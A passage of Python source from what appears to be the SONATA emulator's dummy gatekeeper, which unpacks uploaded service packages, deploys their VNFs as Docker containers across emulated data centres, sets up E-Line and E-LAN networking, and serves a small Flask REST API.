self._load_package_descriptor()
self._load_nsd()
self._load_vnfd()
if DEPLOY_SAP:
self._load_saps()
# 3. prepare container images (e.g. download or build Dockerfile)
if BUILD_DOCKERFILE:
self._load_docker_files()
self._build_images_from_dockerfiles()
else:
self._load_docker_urls()
self._pull_predefined_dockerimages()
LOG.info("On-boarded service: %r" % self.manifest.get("name"))
def start_service(self):
"""
This methods creates and starts a new service instance.
It computes placements, iterates over all VNFDs, and starts
each VNFD as a Docker container in the data center selected
by the placement algorithm.
:return:
"""
LOG.info("Starting service %r" % self.uuid)
# 1. each service instance gets a new uuid to identify it
instance_uuid = str(uuid.uuid4())
# build a instances dict (a bit like a NSR :))
self.instances[instance_uuid] = dict()
self.instances[instance_uuid]["vnf_instances"] = list()
# 2. compute placement of this service instance (adds DC names to
# VNFDs)
if not GK_STANDALONE_MODE:
# self._calculate_placement(FirstDcPlacement)
self._calculate_placement(RoundRobinDcPlacementWithSAPs)
# 3. start all vnfds that we have in the service (except SAPs)
for vnf_id in self.vnfds:
vnfd = self.vnfds[vnf_id]
vnfi = None
if not GK_STANDALONE_MODE:
vnfi = self._start_vnfd(vnfd, vnf_id)
self.instances[instance_uuid]["vnf_instances"].append(vnfi)
# 4. start all SAPs in the service
for sap in self.saps:
self._start_sap(self.saps[sap], instance_uuid)
# 5. Deploy E-Line and E_LAN links
# Attention: Only done if ""forwarding_graphs" section in NSD exists,
# even if "forwarding_graphs" are not used directly.
if "virtual_links" in self.nsd and "forwarding_graphs" in self.nsd:
vlinks = self.nsd["virtual_links"]
# constituent virtual links are not checked
# fwd_links = self.nsd["forwarding_graphs"][0]["constituent_virtual_links"]
eline_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-Line")]
elan_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-LAN")]
GK.net.deployed_elines.extend(eline_fwd_links)
GK.net.deployed_elans.extend(elan_fwd_links)
# 5a. deploy E-Line links
self._connect_elines(eline_fwd_links, instance_uuid)
# 5b. deploy E-LAN links
self._connect_elans(elan_fwd_links, instance_uuid)
# 6. run the emulator specific entrypoint scripts in the VNFIs of this
# service instance
self._trigger_emulator_start_scripts_in_vnfis(
self.instances[instance_uuid]["vnf_instances"])
LOG.info("Service started. Instance id: %r" % instance_uuid)
return instance_uuid
def stop_service(self, instance_uuid):
"""
This method stops a running service instance.
It iterates over all VNF instances, stopping them each
and removing them from their data center.
:param instance_uuid: the uuid of the service instance to be stopped
"""
LOG.info("Stopping service %r" % self.uuid)
# get relevant information
# instance_uuid = str(self.uuid.uuid4())
vnf_instances = self.instances[instance_uuid]["vnf_instances"]
# trigger stop skripts in vnf instances and wait a few seconds for
# completion
self._trigger_emulator_stop_scripts_in_vnfis(vnf_instances)
time.sleep(VNF_STOP_WAIT_TIME)
for v in vnf_instances:
self._stop_vnfi(v)
for sap_name in self.saps_ext:
ext_sap = self.saps[sap_name]
target_dc = ext_sap.get("dc")
target_dc.removeExternalSAP(sap_name)
LOG.info("Stopping the SAP instance: %r in DC %r" %
(sap_name, target_dc))
if not GK_STANDALONE_MODE:
# remove placement?
# self._remove_placement(RoundRobinPlacement)
None
# last step: remove the instance from the list of all instances
del self.instances[instance_uuid]
def _start_vnfd(self, vnfd, vnf_id, **kwargs):
"""
Start a single VNFD of this service
:param vnfd: vnfd descriptor dict
:param vnf_id: unique id of this vnf in the nsd
:return:
"""
# the vnf_name refers to the container image to be deployed
vnf_name = vnfd.get("name")
# iterate over all deployment units within each VNFDs
for u in vnfd.get("virtual_deployment_units"):
# 1. get the name of the docker image to start and the assigned DC
if vnf_id not in self.remote_docker_image_urls:
raise Exception("No image name for %r found. Abort." % vnf_id)
docker_name = self.remote_docker_image_urls.get(vnf_id)
target_dc = vnfd.get("dc")
# 2. perform some checks to ensure we can start the container
assert(docker_name is not None)
assert(target_dc is not None)
if not self._check_docker_image_exists(docker_name):
raise Exception(
"Docker image %r not found. Abort." % docker_name)
# 3. get the resource limits
res_req = u.get("resource_requirements")
cpu_list = res_req.get("cpu").get("cores")
if cpu_list is None:
cpu_list = res_req.get("cpu").get("vcpus")
if cpu_list is None:
cpu_list = "1"
cpu_bw = res_req.get("cpu").get("cpu_bw")
if not cpu_bw:
cpu_bw = 1
mem_num = str(res_req.get("memory").get("size"))
if len(mem_num) == 0:
mem_num = "2"
mem_unit = str(res_req.get("memory").get("size_unit"))
if str(mem_unit) == 0:
mem_unit = "GB"
mem_limit = float(mem_num)
if mem_unit == "GB":
mem_limit = mem_limit * 1024 * 1024 * 1024
elif mem_unit == "MB":
mem_limit = mem_limit * 1024 * 1024
elif mem_unit == "KB":
mem_limit = mem_limit * 1024
mem_lim = int(mem_limit)
cpu_period, cpu_quota = self._calculate_cpu_cfs_values(
float(cpu_bw))
# check if we need to deploy the management ports
intfs = vnfd.get("connection_points", [])
mgmt_intf_names = []
if USE_DOCKER_MGMT:
mgmt_intfs = [vnf_id + ':' + intf['id']
for intf in intfs if intf.get('type') == 'management']
# check if any of these management interfaces are used in a
# management-type network in the nsd
for nsd_intf_name in mgmt_intfs:
vlinks = [l["connection_points_reference"]
for l in self.nsd.get("virtual_links", [])]
for link in vlinks:
if nsd_intf_name in link and self.check_mgmt_interface(
link):
# this is indeed a management interface and can be
# skipped
vnf_id, vnf_interface, vnf_sap_docker_name = parse_interface(
nsd_intf_name)
found_interfaces = [
intf for intf in intfs if intf.get('id') == vnf_interface]
intfs.remove(found_interfaces[0])
mgmt_intf_names.append(vnf_interface)
# 4. generate the volume paths for the docker container
volumes = list()
# a volume to extract log files
docker_log_path = "/tmp/results/%s/%s" % (self.uuid, vnf_id)
LOG.debug("LOG path for vnf %s is %s." % (vnf_id, docker_log_path))
if not os.path.exists(docker_log_path):
LOG.debug("Creating folder %s" % docker_log_path)
os.makedirs(docker_log_path)
volumes.append(docker_log_path + ":/mnt/share/")
# 5. do the dc.startCompute(name="foobar") call to run the container
# TODO consider flavors, and other annotations
# TODO: get all vnf id's from the nsd for this vnfd and use those as dockername
# use the vnf_id in the nsd as docker name
# so deployed containers can be easily mapped back to the nsd
LOG.info("Starting %r as %r in DC %r" %
(vnf_name, vnf_id, vnfd.get("dc")))
LOG.debug("Interfaces for %r: %r" % (vnf_id, intfs))
vnfi = target_dc.startCompute(
vnf_id,
network=intfs,
image=docker_name,
flavor_name="small",
cpu_quota=cpu_quota,
cpu_period=cpu_period,
cpuset=cpu_list,
mem_limit=mem_lim,
volumes=volumes,
type=kwargs.get('type', 'docker'))
# rename the docker0 interfaces (eth0) to the management port name
# defined in the VNFD
if USE_DOCKER_MGMT:
for intf_name in mgmt_intf_names:
self._vnf_reconfigure_network(
vnfi, 'eth0', new_name=intf_name)
return vnfi
def _stop_vnfi(self, vnfi):
"""
Stop a VNF instance.
:param vnfi: vnf instance to be stopped
"""
# Find the correct datacenter
status = vnfi.getStatus()
dc = vnfi.datacenter
# stop the vnfi
LOG.info("Stopping the vnf instance contained in %r in DC %r" %
(status["name"], dc))
dc.stopCompute(status["name"])
def _get_vnf_instance(self, instance_uuid, vnf_id):
"""
Returns the Docker object for the given VNF id (or Docker name).
:param instance_uuid: UUID of the service instance to search in.
:param name: VNF name or Docker name. We are fuzzy here.
:return:
"""
dn = vnf_id
for vnfi in self.instances[instance_uuid]["vnf_instances"]:
if vnfi.name == dn:
return vnfi
LOG.warning("No container with name: {0} found.".format(dn))
return None
@staticmethod
def _vnf_reconfigure_network(vnfi, if_name, net_str=None, new_name=None):
"""
Reconfigure the network configuration of a specific interface
of a running container.
:param vnfi: container instance
:param if_name: interface name
:param net_str: network configuration string, e.g., 1.2.3.4/24
:return:
"""
# assign new ip address
if net_str is not None:
intf = vnfi.intf(intf=if_name)
if intf is not None:
intf.setIP(net_str)
LOG.debug("Reconfigured network of %s:%s to %r" %
(vnfi.name, if_name, net_str))
else:
LOG.warning("Interface not found: %s:%s. Network reconfiguration skipped." % (
vnfi.name, if_name))
if new_name is not None:
vnfi.cmd('ip link set', if_name, 'down')
vnfi.cmd('ip link set', if_name, 'name', new_name)
vnfi.cmd('ip link set', new_name, 'up')
LOG.debug("Reconfigured interface name of %s:%s to %s" %
(vnfi.name, if_name, new_name))
def _trigger_emulator_start_scripts_in_vnfis(self, vnfi_list):
for vnfi in vnfi_list:
config = vnfi.dcinfo.get("Config", dict())
env = config.get("Env", list())
for env_var in env:
var, cmd = map(str.strip, map(str, env_var.split('=', 1)))
LOG.debug("%r = %r" % (var, cmd))
if var == "SON_EMU_CMD":
LOG.info("Executing entry point script in %r: %r" %
(vnfi.name, cmd))
# execute command in new thread to ensure that GK is not
# blocked by VNF
t = threading.Thread(target=vnfi.cmdPrint, args=(cmd,))
t.daemon = True
t.start()
def _trigger_emulator_stop_scripts_in_vnfis(self, vnfi_list):
for vnfi in vnfi_list:
config = vnfi.dcinfo.get("Config", dict())
env = config.get("Env", list())
for env_var in env:
var, cmd = map(str.strip, map(str, env_var.split('=', 1)))
if var == "SON_EMU_CMD_STOP":
LOG.info("Executing stop script in %r: %r" %
(vnfi.name, cmd))
# execute command in new thread to ensure that GK is not
# blocked by VNF
t = threading.Thread(target=vnfi.cmdPrint, args=(cmd,))
t.daemon = True
t.start()
def _unpack_service_package(self):
"""
unzip *.son file and store contents in CATALOG_FOLDER/services/<service_uuid>/
"""
LOG.info("Unzipping: %r" % self.package_file_path)
with zipfile.ZipFile(self.package_file_path, "r") as z:
z.extractall(self.package_content_path)
def _load_package_descriptor(self):
"""
Load the main package descriptor YAML and keep it as dict.
:return:
"""
self.manifest = load_yaml(
os.path.join(
self.package_content_path, "META-INF/MANIFEST.MF"))
def _load_nsd(self):
"""
Load the entry NSD YAML and keep it as dict.
:return:
"""
if "entry_service_template" in self.manifest:
nsd_path = os.path.join(
self.package_content_path,
make_relative_path(self.manifest.get("entry_service_template")))
self.nsd = load_yaml(nsd_path)
GK.net.deployed_nsds.append(self.nsd)
# create dict to find the vnf_name for any vnf id
self.vnf_id2vnf_name = defaultdict(lambda: "NotExistingNode",
reduce(lambda x, y: dict(x, **y),
map(lambda d: {d["vnf_id"]: d["vnf_name"]},
self.nsd["network_functions"])))
LOG.debug("Loaded NSD: %r" % self.nsd.get("name"))
def _load_vnfd(self):
"""
Load all VNFD YAML files referenced in MANIFEST.MF and keep them in dict.
:return:
"""
# first make a list of all the vnfds in the package
vnfd_set = dict()
if "package_content" in self.manifest:
for pc in self.manifest.get("package_content"):
if pc.get(
"content-type") == "application/sonata.function_descriptor":
vnfd_path = os.path.join(
self.package_content_path,
make_relative_path(pc.get("name")))
vnfd = load_yaml(vnfd_path)
vnfd_set[vnfd.get("name")] = vnfd
# then link each vnf_id in the nsd to its vnfd
for vnf_id in self.vnf_id2vnf_name:
vnf_name = self.vnf_id2vnf_name[vnf_id]
self.vnfds[vnf_id] = vnfd_set[vnf_name]
LOG.debug("Loaded VNFD: {0} id: {1}".format(vnf_name, vnf_id))
def _load_saps(self):
# create list of all SAPs
# check if we need to deploy management ports
if USE_DOCKER_MGMT:
SAPs = [p for p in self.nsd["connection_points"]
if 'management' not in p.get('type')]
else:
SAPs = [p for p in self.nsd["connection_points"]]
for sap in SAPs:
# endpoint needed in this service
sap_id, sap_interface, sap_docker_name = parse_interface(sap['id'])
# make sure SAP has type set (default internal)
sap["type"] = sap.get("type", 'internal')
# Each Service Access Point (connection_point) in the nsd is an IP
# address on the host
if sap["type"] == "external":
# add to vnfds to calculate placement later on
sap_net = SAP_SUBNETS.pop(0)
self.saps[sap_docker_name] = {
"name": sap_docker_name, "type": "external", "net": sap_net}
# add SAP vnf to list in the NSD so it is deployed later on
# each SAP gets a unique VNFD and vnf_id in the NSD and custom
# type (only defined in the dummygatekeeper)
self.nsd["network_functions"].append(
{"vnf_id": sap_docker_name, "vnf_name": sap_docker_name, "vnf_type": "sap_ext"})
# Each Service Access Point (connection_point) in the nsd is
# getting its own container (default)
elif sap["type"] == "internal" or sap["type"] == "management":
# add SAP to self.vnfds
if SAP_VNFD is None:
sapfile = pkg_resources.resource_filename(
__name__, "sap_vnfd.yml")
else:
sapfile = SAP_VNFD
sap_vnfd = load_yaml(sapfile)
sap_vnfd["connection_points"][0]["id"] = sap_interface
sap_vnfd["name"] = sap_docker_name
sap_vnfd["type"] = "internal"
# add to vnfds to calculate placement later on and deploy
self.saps[sap_docker_name] = sap_vnfd
# add SAP vnf to list in the NSD so it is deployed later on
# each SAP get a unique VNFD and vnf_id in the NSD
self.nsd["network_functions"].append(
{"vnf_id": sap_docker_name, "vnf_name": sap_docker_name, "vnf_type": "sap_int"})
LOG.debug("Loaded SAP: name: {0}, type: {1}".format(
sap_docker_name, sap['type']))
# create sap lists
self.saps_ext = [self.saps[sap]['name']
for sap in self.saps if self.saps[sap]["type"] == "external"]
self.saps_int = [self.saps[sap]['name']
for sap in self.saps if self.saps[sap]["type"] == "internal"]
def _start_sap(self, sap, instance_uuid):
if not DEPLOY_SAP:
return
LOG.info('start SAP: {0} ,type: {1}'.format(sap['name'], sap['type']))
if sap["type"] == "internal":
vnfi = None
if not GK_STANDALONE_MODE:
vnfi = self._start_vnfd(sap, sap['name'], type='sap_int')
self.instances[instance_uuid]["vnf_instances"].append(vnfi)
elif sap["type"] == "external":
target_dc = sap.get("dc")
# add interface to dc switch
target_dc.attachExternalSAP(sap['name'], sap['net'])
def _connect_elines(self, eline_fwd_links, instance_uuid):
"""
Connect all E-LINE links in the NSD
:param eline_fwd_links: list of E-LINE links in the NSD
:param: instance_uuid of the service
:return:
"""
# cookie is used as identifier for the flowrules installed by the dummygatekeeper
# eg. different services get a unique cookie for their flowrules
cookie = 1
for link in eline_fwd_links:
# check if we need to deploy this link when its a management link:
if USE_DOCKER_MGMT:
if self.check_mgmt_interface(
link["connection_points_reference"]):
continue
src_id, src_if_name, src_sap_id = parse_interface(
link["connection_points_reference"][0])
dst_id, dst_if_name, dst_sap_id = parse_interface(
link["connection_points_reference"][1])
setChaining = False
# check if there is a SAP in the link and chain everything together
if src_sap_id in self.saps and dst_sap_id in self.saps:
LOG.info(
'2 SAPs cannot be chained together : {0} - {1}'.format(src_sap_id, dst_sap_id))
continue
elif src_sap_id in self.saps_ext:
src_id = src_sap_id
# set intf name to None so the chaining function will choose
# the first one
src_if_name = None
dst_vnfi = self._get_vnf_instance(instance_uuid, dst_id)
if dst_vnfi is not None:
# choose first ip address in sap subnet
sap_net = self.saps[src_sap_id]['net']
sap_ip = "{0}/{1}".format(str(sap_net[2]),
sap_net.prefixlen)
self._vnf_reconfigure_network(
dst_vnfi, dst_if_name, sap_ip)
setChaining = True
elif dst_sap_id in self.saps_ext:
dst_id = dst_sap_id
# set intf name to None so the chaining function will choose
# the first one
dst_if_name = None
src_vnfi = self._get_vnf_instance(instance_uuid, src_id)
if src_vnfi is not None:
sap_net = self.saps[dst_sap_id]['net']
sap_ip = "{0}/{1}".format(str(sap_net[2]),
sap_net.prefixlen)
self._vnf_reconfigure_network(
src_vnfi, src_if_name, sap_ip)
setChaining = True
# Link between 2 VNFs
else:
# make sure we use the correct sap vnf name
if src_sap_id in self.saps_int:
src_id = src_sap_id
if dst_sap_id in self.saps_int:
dst_id = dst_sap_id
# re-configure the VNFs IP assignment and ensure that a new
# subnet is used for each E-Link
src_vnfi = self._get_vnf_instance(instance_uuid, src_id)
dst_vnfi = self._get_vnf_instance(instance_uuid, dst_id)
if src_vnfi is not None and dst_vnfi is not None:
eline_net = ELINE_SUBNETS.pop(0)
ip1 = "{0}/{1}".format(str(eline_net[1]),
eline_net.prefixlen)
ip2 = "{0}/{1}".format(str(eline_net[2]),
eline_net.prefixlen)
self._vnf_reconfigure_network(src_vnfi, src_if_name, ip1)
self._vnf_reconfigure_network(dst_vnfi, dst_if_name, ip2)
setChaining = True
# Set the chaining
if setChaining:
GK.net.setChain(
src_id, dst_id,
vnf_src_interface=src_if_name, vnf_dst_interface=dst_if_name,
bidirectional=BIDIRECTIONAL_CHAIN, cmd="add-flow", cookie=cookie, priority=10)
LOG.debug(
"Setting up E-Line link. (%s:%s) -> (%s:%s)" % (
src_id, src_if_name, dst_id, dst_if_name))
def _connect_elans(self, elan_fwd_links, instance_uuid):
"""
Connect all E-LAN links in the NSD
:param elan_fwd_links: list of E-LAN links in the NSD
:param: instance_uuid of the service
:return:
"""
for link in elan_fwd_links:
# check if we need to deploy this link when its a management link:
if USE_DOCKER_MGMT:
if self.check_mgmt_interface(
link["connection_points_reference"]):
continue
elan_vnf_list = []
# check if an external SAP is in the E-LAN (then a subnet is
# already defined)
intfs_elan = [intf for intf in link["connection_points_reference"]]
lan_sap = self.check_ext_saps(intfs_elan)
if lan_sap:
lan_net = self.saps[lan_sap]['net']
lan_hosts = list(lan_net.hosts())
else:
lan_net = ELAN_SUBNETS.pop(0)
lan_hosts = list(lan_net.hosts())
# generate lan ip address for all interfaces except external SAPs
for intf in link["connection_points_reference"]:
# skip external SAPs, they already have an ip
vnf_id, vnf_interface, vnf_sap_docker_name = parse_interface(
intf)
if vnf_sap_docker_name in self.saps_ext:
elan_vnf_list.append(
{'name': vnf_sap_docker_name, 'interface': vnf_interface})
continue
ip_address = "{0}/{1}".format(str(lan_hosts.pop(0)),
lan_net.prefixlen)
vnf_id, intf_name, vnf_sap_id = parse_interface(intf)
# make sure we use the correct sap vnf name
src_docker_name = vnf_id
if vnf_sap_id in self.saps_int:
src_docker_name = vnf_sap_id
vnf_id = vnf_sap_id
LOG.debug(
"Setting up E-LAN interface. (%s:%s) -> %s" % (
vnf_id, intf_name, ip_address))
# re-configure the VNFs IP assignment and ensure that a new subnet is used for each E-LAN
# E-LAN relies on the learning switch capability of Ryu which has to be turned on in the topology
# (DCNetwork(controller=RemoteController, enable_learning=True)), so no explicit chaining is necessary.
vnfi = self._get_vnf_instance(instance_uuid, vnf_id)
if vnfi is not None:
self._vnf_reconfigure_network(vnfi, intf_name, ip_address)
# add this vnf and interface to the E-LAN for tagging
elan_vnf_list.append(
{'name': src_docker_name, 'interface': intf_name})
# install the VLAN tags for this E-LAN
GK.net.setLAN(elan_vnf_list)
def _load_docker_files(self):
"""
Get all paths to Dockerfiles from VNFDs and store them in dict.
:return:
"""
for k, v in self.vnfds.iteritems():
for vu in v.get("virtual_deployment_units"):
if vu.get("vm_image_format") == "docker":
vm_image = vu.get("vm_image")
docker_path = os.path.join(
self.package_content_path,
make_relative_path(vm_image))
self.local_docker_files[k] = docker_path
LOG.debug("Found Dockerfile (%r): %r" % (k, docker_path))
def _load_docker_urls(self):
"""
Get all URLs to pre-build docker images in some repo.
:return:
"""
# also merge sap dicts, because internal saps also need a docker
# container
all_vnfs = self.vnfds.copy()
all_vnfs.update(self.saps)
for k, v in all_vnfs.iteritems():
for vu in v.get("virtual_deployment_units", {}):
if vu.get("vm_image_format") == "docker":
url = vu.get("vm_image")
if url is not None:
url = url.replace("http://", "")
self.remote_docker_image_urls[k] = url
LOG.debug("Found Docker image URL (%r): %r" %
(k, self.remote_docker_image_urls[k]))
def _build_images_from_dockerfiles(self):
"""
Build Docker images for each local Dockerfile found in the package: self.local_docker_files
"""
if GK_STANDALONE_MODE:
return # do not build anything in standalone mode
dc = DockerClient()
LOG.info("Building %d Docker images (this may take several minutes) ..." % len(
self.local_docker_files))
for k, v in self.local_docker_files.iteritems():
for line in dc.build(path=v.replace(
"Dockerfile", ""), tag=k, rm=False, nocache=False):
LOG.debug("DOCKER BUILD: %s" % line)
LOG.info("Docker image created: %s" % k)
def _pull_predefined_dockerimages(self):
"""
If the package contains URLs to pre-build Docker images, we download them with this method.
"""
dc = DockerClient()
for url in self.remote_docker_image_urls.itervalues():
# only pull if not present (speedup for development)
if not FORCE_PULL:
if len(dc.images.list(name=url)) > 0:
LOG.debug("Image %r present. Skipping pull." % url)
continue
LOG.info("Pulling image: %r" % url)
# this seems to fail with latest docker api version 2.0.2
# dc.images.pull(url,
# insecure_registry=True)
# using docker cli instead
cmd = ["docker",
"pull",
url,
]
Popen(cmd).wait()
def _check_docker_image_exists(self, image_name):
"""
Query the docker service and check if the given image exists
:param image_name: name of the docker image
:return:
"""
return len(DockerClient().images.list(name=image_name)) > 0
def _calculate_placement(self, algorithm):
"""
Do placement by adding the a field "dc" to
each VNFD that points to one of our
data center objects known to the gatekeeper.
"""
assert(len(self.vnfds) > 0)
assert(len(GK.dcs) > 0)
# instantiate algorithm an place
p = algorithm()
p.place(self.nsd, self.vnfds, self.saps, GK.dcs)
LOG.info("Using placement algorithm: %r" % p.__class__.__name__)
# lets print the placement result
for name, vnfd in self.vnfds.iteritems():
LOG.info("Placed VNF %r on DC %r" % (name, str(vnfd.get("dc"))))
for sap in self.saps:
sap_dict = self.saps[sap]
LOG.info("Placed SAP %r on DC %r" % (sap, str(sap_dict.get("dc"))))
def _calculate_cpu_cfs_values(self, cpu_time_percentage):
"""
Calculate cpu period and quota for CFS
:param cpu_time_percentage: percentage of overall CPU to be used
:return: cpu_period, cpu_quota
"""
if cpu_time_percentage is None:
return -1, -1
if cpu_time_percentage < 0:
return -1, -1
# (see: https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt)
# Attention minimum cpu_quota is 1ms (micro)
cpu_period = 1000000 # lets consider a fixed period of 1000000 microseconds for now
LOG.debug("cpu_period is %r, cpu_percentage is %r" %
(cpu_period, cpu_time_percentage))
# calculate the fraction of cpu time for this container
cpu_quota = cpu_period * cpu_time_percentage
# ATTENTION >= 1000 to avoid a invalid argument system error ... no
# idea why
if cpu_quota < 1000:
LOG.debug("cpu_quota before correcting: %r" % cpu_quota)
cpu_quota = 1000
LOG.warning("Increased CPU quota to avoid system error.")
LOG.debug("Calculated: cpu_period=%f / cpu_quota=%f" %
(cpu_period, cpu_quota))
return int(cpu_period), int(cpu_quota)
def check_ext_saps(self, intf_list):
# check if the list of interfacs contains an external SAP
saps_ext = [self.saps[sap]['name']
for sap in self.saps if self.saps[sap]["type"] == "external"]
for intf_name in intf_list:
vnf_id, vnf_interface, vnf_sap_docker_name = parse_interface(
intf_name)
if vnf_sap_docker_name in saps_ext:
return vnf_sap_docker_name
def check_mgmt_interface(self, intf_list):
SAPs_mgmt = [p.get('id') for p in self.nsd["connection_points"]
if 'management' in p.get('type')]
for intf_name in intf_list:
if intf_name in SAPs_mgmt:
return True
"""
Some (simple) placement algorithms
"""
class FirstDcPlacement(object):
"""
Placement: Always use one and the same data center from the GK.dcs dict.
"""
def place(self, nsd, vnfds, saps, dcs):
for id, vnfd in vnfds.iteritems():
vnfd["dc"] = list(dcs.itervalues())[0]
class RoundRobinDcPlacement(object):
"""
Placement: Distribute VNFs across all available DCs in a round robin fashion.
"""
def place(self, nsd, vnfds, saps, dcs):
c = 0
dcs_list = list(dcs.itervalues())
for id, vnfd in vnfds.iteritems():
vnfd["dc"] = dcs_list[c % len(dcs_list)]
c += 1 # inc. c to use next DC
class RoundRobinDcPlacementWithSAPs(object):
"""
Placement: Distribute VNFs across all available DCs in a round robin fashion,
every SAP is instantiated on the same DC as the connected VNF.
"""
def place(self, nsd, vnfds, saps, dcs):
# place vnfs
c = 0
dcs_list = list(dcs.itervalues())
for id, vnfd in vnfds.iteritems():
vnfd["dc"] = dcs_list[c % len(dcs_list)]
c += 1 # inc. c to use next DC
# place SAPs
vlinks = nsd.get("virtual_links", [])
eline_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-Line")]
elan_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-LAN")]
# SAPs on E-Line links are placed on the same DC as the VNF on the
# E-Line
for link in eline_fwd_links:
src_id, src_if_name, src_sap_id = parse_interface(
link["connection_points_reference"][0])
dst_id, dst_if_name, dst_sap_id = parse_interface(
link["connection_points_reference"][1])
# check if there is a SAP in the link
if src_sap_id in saps:
# get dc where connected vnf is mapped to
dc = vnfds[dst_id]['dc']
saps[src_sap_id]['dc'] = dc
if dst_sap_id in saps:
# get dc where connected vnf is mapped to
dc = vnfds[src_id]['dc']
saps[dst_sap_id]['dc'] = dc
# SAPs on E-LANs are placed on a random DC
dcs_list = list(dcs.itervalues())
dc_len = len(dcs_list)
for link in elan_fwd_links:
for intf in link["connection_points_reference"]:
# find SAP interfaces
intf_id, intf_name, intf_sap_id = parse_interface(intf)
if intf_sap_id in saps:
dc = dcs_list[randint(0, dc_len - 1)]
saps[intf_sap_id]['dc'] = dc
"""
Resource definitions and API endpoints
"""
class Packages(fr.Resource):
def post(self):
"""
Upload a *.son service package to the dummy gatekeeper.
We expect request with a *.son file and store it in UPLOAD_FOLDER
:return: UUID
"""
try:
# get file contents
LOG.info("POST /packages called")
# lets search for the package in the request
is_file_object = False # make API more robust: file can be in data or in files field
if "package" in request.files:
son_file = request.files["package"]
is_file_object = True
elif len(request.data) > 0:
son_file = request.data
else:
return {"service_uuid": None, "size": 0, "sha1": None,
"error": "upload failed. file not found."}, 500
# generate a uuid to reference this package
service_uuid = str(uuid.uuid4())
file_hash = hashlib.sha1(str(son_file)).hexdigest()
# ensure that upload folder exists
ensure_dir(UPLOAD_FOLDER)
upload_path = os.path.join(UPLOAD_FOLDER, "%s.son" % service_uuid)
# store *.son file to disk
if is_file_object:
son_file.save(upload_path)
else:
with open(upload_path, 'wb') as f:
f.write(son_file)
size = os.path.getsize(upload_path)
# first stop and delete any other running services
if AUTO_DELETE:
service_list = copy.copy(GK.services)
for service_uuid in service_list:
instances_list = copy.copy(
GK.services[service_uuid].instances)
for instance_uuid in instances_list:
# valid service and instance UUID, stop service
GK.services.get(service_uuid).stop_service(
instance_uuid)
LOG.info("service instance with uuid %r stopped." %
instance_uuid)
# create a service object and register it
s = Service(service_uuid, file_hash, upload_path)
GK.register_service_package(service_uuid, s)
# automatically deploy the service
if AUTO_DEPLOY:
# ok, we have a service uuid, lets start the service
reset_subnets()
GK.services.get(service_uuid).start_service()
# generate the JSON result
return {"service_uuid": service_uuid, "size": size,
"sha1": file_hash, "error": None}, 201
except BaseException:
LOG.exception("Service package upload failed:")
return {"service_uuid": None, "size": 0,
"sha1": None, "error": "upload failed"}, 500
def get(self):
"""
Return a list of UUID's of uploaded service packages.
:return: dict/list
"""
LOG.info("GET /packages")
return {"service_uuid_list": list(GK.services.iterkeys())}
class Instantiations(fr.Resource):
def post(self):
"""
Instantiate a service specified by its UUID.
Will return a new UUID to identify the running service instance.
:return: UUID
"""
LOG.info("POST /instantiations (or /requests) called")
# try to extract the service uuid from the request
json_data = request.get_json(force=True)
service_uuid = json_data.get("service_uuid")
# lets be a bit fuzzy here to make testing easier
if (service_uuid is None or service_uuid ==
"latest") and len(GK.services) > 0:
# if we don't get a service uuid, we simple start the first service
# in the list
service_uuid = list(GK.services.iterkeys())[0]
if service_uuid in GK.services:
# ok, we have a service uuid, lets start the service
service_instance_uuid = GK.services.get(
service_uuid).start_service()
return {"service_instance_uuid": service_instance_uuid}, 201
return "Service not found", 404
def get(self):
"""
Returns a list of UUIDs containing all running services.
:return: dict / list
"""
LOG.info("GET /instantiations")
return {"service_instantiations_list": [
list(s.instances.iterkeys()) for s in GK.services.itervalues()]}
def delete(self):
"""
Stops a running service specified by its service and instance UUID.
"""
# try to extract the service and instance UUID from the request
json_data = request.get_json(force=True)
service_uuid = json_data.get("service_uuid")
instance_uuid = json_data.get("service_instance_uuid")
# try to be fuzzy
if service_uuid is None and len(GK.services) > 0:
# if we don't get a service uuid, we simply stop the last service
# in the list
service_uuid = list(GK.services.iterkeys())[0]
if instance_uuid is None and len(
GK.services[service_uuid].instances) > 0:
instance_uuid = list(
GK.services[service_uuid].instances.iterkeys())[0]
if service_uuid in GK.services and instance_uuid in GK.services[service_uuid].instances:
# valid service and instance UUID, stop service
GK.services.get(service_uuid).stop_service(instance_uuid)
return "service instance with uuid %r stopped." % instance_uuid, 200
return "Service not found", 404
class Exit(fr.Resource):
def put(self):
"""
Stop the running Containernet instance regardless of data transmitted
"""
list(GK.dcs.values())[0].net.stop()
def initialize_GK():
global GK
GK = Gatekeeper()
# create a single, global GK object
GK = None
initialize_GK()
# setup Flask
app = Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 512 * 1024 * 1024 # 512 MB max upload
api = fr.Api(app)
# define endpoints
api.add_resource(Packages, '/packages', '/api/v2/packages')
api.add_resource(Instantiations, '/instantiations',
'/api/v2/instantiations', '/api/v2/requests')
api.add_resource(Exit, '/emulator/exit')
def start_rest_api(host, port, datacenters=dict()):
GK.dcs = datacenters
GK.net = get_dc_network()
# start the Flask server (not the best performance but ok for our use case)
app.run(host=host,
port=port,
debug=True,
use_reloader=False # this is needed to run Flask in a non-main thread
)
def ensure_dir(name):
if not os.path.exists(name):
os.makedirs(name)
def load_yaml(path):
with open(path, "r") as f:
try:
r = yaml.load(f)
except yaml.YAMLError as exc:
LOG.exception("YAML parse error: %r" % str(exc))
r = dict()
return r
def make_relative_path(path):
if path.startswith("file://"):
path = path.replace("file://", "", 1)
if path.startswith("/"):
path = path.replace("/", "", 1)
return path
def get_dc_network():
"""
retrieve the DCnetwork where this dummygatekeeper (GK) connects to.
Assume at least 1 datacenter is connected to this GK, and that all datacenters belong to the same DCNetwork
:return:
"""
assert (len(GK.dcs) > 0)
return GK.dcs.values()[0].net
def parse_interface(interface_name):
"""
convert the interface name in the nsd to the according vnf_id, vnf_interface names
:param interface_name:
:return:
"""
if ':' in interface_name:
vnf_id, vnf_interface = interface_name.split(':')
vnf_sap_docker_name = interface_name.replace(':', '_')
else:
vnf_id = interface_name
vnf_interface = interface_name
vnf_sap_docker_name = interface_name
return vnf_id, vnf_interface, vnf_sap_docker_name
def reset_subnets():
# private subnet definitions for the generated interfaces
# 10.10.xxx.0/24
global SAP_SUBNETS
SAP_SUBNETS = generate_subnets('10.10', 0, subnet_size=50, mask=30)
# 10.20.xxx.0/30
global ELAN_SUBNETS
